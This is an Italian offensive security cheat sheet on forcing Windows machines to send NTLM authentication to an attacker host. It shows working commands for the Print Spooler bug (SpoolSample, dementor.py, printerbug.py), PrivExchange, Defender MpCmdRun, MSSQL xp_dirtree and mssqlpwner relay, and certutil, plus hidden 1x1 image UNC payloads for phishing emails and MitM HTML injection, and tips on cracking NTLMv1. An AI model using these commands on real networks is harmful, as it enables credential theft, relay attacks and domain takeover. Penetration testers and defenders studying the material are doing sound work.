Force NTLM Privileged Authentication

SharpSystemTriggers

SharpSystemTriggers è una collezione di trigger di autenticazione remota codificati in C# utilizzando il compilatore MIDL per evitare dipendenze di terze parti.

Abuso del servizio Spooler

Se il servizio Print Spooler è abilitato, puoi utilizzare alcune credenziali AD già note per richiedere al server di stampa del Domain Controller un aggiornamento sui nuovi lavori di stampa e semplicemente dirgli di inviare la notifica a un sistema. Nota che quando la stampante invia la notifica a sistemi arbitrari, deve autenticarsi contro quel sistema. Pertanto, un attaccante può far sì che il servizio Print Spooler si autentichi contro un sistema arbitrario, e il servizio utilizzerà l'account del computer in questa autenticazione.

Trovare server Windows nel dominio

Utilizzando PowerShell, ottieni un elenco di macchine Windows. I server sono solitamente prioritari, quindi concentriamoci lì:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Trovare i servizi Spooler in ascolto

Utilizzando un @mysmartlogin (Vincent Le Toux) leggermente modificato SpoolerScanner, verifica se il Servizio Spooler è in ascolto:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Puoi anche utilizzare rpcdump.py su Linux e cercare il protocollo MS-RPRN.

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Chiedi al servizio di autenticarsi contro un host arbitrario

Puoi compilare SpoolSample da qui.

SpoolSample.exe <TARGET> <RESPONDERIP>

o usa dementor.py di 3xocyte o printerbug.py se sei su Linux

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

Combinazione con Delegazione Illimitata

Se un attaccante ha già compromesso un computer con Delegazione Illimitata, l'attaccante potrebbe far autenticare la stampante contro questo computer. A causa della delegazione illimitata, il TGT dell'account computer della stampante sarà salvato in memoria del computer con delegazione illimitata. Poiché l'attaccante ha già compromesso questo host, sarà in grado di recuperare questo ticket e abusarne (Pass the Ticket).

Forzare l'autenticazione RCP

GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.GitHub

PrivExchange

L'attacco PrivExchange è il risultato di un difetto trovato nella funzione PushSubscription di Exchange Server. Questa funzione consente al server Exchange di essere forzato da qualsiasi utente di dominio con una casella di posta ad autenticarsi su qualsiasi host fornito dal client tramite HTTP.

Per impostazione predefinita, il servizio Exchange viene eseguito come SYSTEM e ha privilegi eccessivi (specificamente, ha privilegi WriteDacl sull'aggiornamento cumulativo del dominio pre-2019). Questo difetto può essere sfruttato per abilitare il rilascio di informazioni a LDAP e successivamente estrarre il database NTDS del dominio. Nei casi in cui il rilascio a LDAP non sia possibile, questo difetto può comunque essere utilizzato per rilasciare e autenticarsi su altri host all'interno del dominio. Lo sfruttamento riuscito di questo attacco concede accesso immediato all'Amministratore di Dominio con qualsiasi account utente di dominio autenticato.

All'interno di Windows

Se sei già all'interno della macchina Windows, puoi forzare Windows a connettersi a un server utilizzando account privilegiati con:

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Or use this other technique: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

È possibile utilizzare certutil.exe lolbin (binary firmato da Microsoft) per forzare l'autenticazione NTLM:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML injection

Via email

Se conosci l'indirizzo email dell'utente che accede a una macchina che vuoi compromettere, potresti semplicemente inviargli un email con un'immagine 1x1 come

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

e quando lo apre, cercherà di autenticarsi.

MitM

Se puoi eseguire un attacco MitM su un computer e iniettare HTML in una pagina che visualizzerà, potresti provare a iniettare un'immagine come la seguente nella pagina:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Cracking NTLMv1

Se riesci a catturare le sfide NTLMv1 leggi qui come crackerle. Ricorda che per crackare NTLMv1 devi impostare la sfida di Responder su "1122334455667788"